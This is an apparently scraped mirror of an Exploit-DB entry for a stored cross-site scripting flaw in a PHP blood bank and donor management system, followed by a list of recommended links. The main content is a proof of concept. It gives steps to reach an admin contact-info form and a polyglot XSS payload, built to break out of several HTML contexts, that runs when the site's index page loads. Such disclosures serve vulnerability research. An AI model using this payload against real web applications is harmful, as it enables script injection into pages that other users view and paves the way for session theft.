[remote] Blood Bank & Donor Management System using v2.2 - Stored XSS

7 months ago

source link: https://www.exploit-db.com/exploits/51750
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Blood Bank & Donor Management System using v2.2 - Stored XSS

EDB-ID:

51750

EDB Verified:

Exploit:

Platform:

PHP

Date:

2024-01-29

Vulnerable App:

# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
# Application: Blood Donor Management System
# Version: v2.2   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Date: 12.09.2023
# Author: SoSPiro
# Tested on: Windows

#POC
========================================
1. Login to admin account
2. Go to /admin/update-contactinfo.php
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

Copy

Recommend

www.gnome.org 6 years ago
Cache

Anonymous Donor Pledges $1M Donation Over Two Years – GNOME

www.businessinsider.com 2 years ago
Cache

Tories Investigate Donor Borrow-Longain After Insider Investigation

Home ...

www.nature.com 2 years ago
Cache

Retinas revived after donor's death open door to new science

Transcript Listen to the latest from the world of science, with Shamini Bundell and Benjamin Thompson. Host: Benjamin Thompson

www.exploit-db.com 1 year ago
Cache

[webapps] Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)

Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)...

www.exploit-db.com 1 year ago
Cache

[webapps] Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scrip...

Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)...

www.exploit-db.com 1 year ago
Cache

[webapps] Student Study Center Management System v1.0 - Stored Cross-Site Script...

Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)...

www.theverge.com 1 year ago
Cache

The Red Cross lifts its blood donor restrictions for men who have sex with men

The Red Cross lifts its blood donor restrictions for men who have sex with men / The American Red Cross now bases donor eligibility on individual risk factors, which include recent sexual activity across all demograph...

www.exploit-db.com 1 year ago
Cache

[webapps] User Registration & Login and User Management System v3.0 - Stored...

User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XS...

www.exploit-db.com 9 months ago
Cache

[webapps] Blood Donor Management System v1.0 - Stored XSS

Blood Donor Management System v1.0 - Stored XSS ...

www.exploit-db.com 7 months ago
Cache

[webapps] GYM MS - GYM Management System - Cross Site Scripting (Stored)

GYM MS - GYM Management System - Cross Site Scripting (Stored)...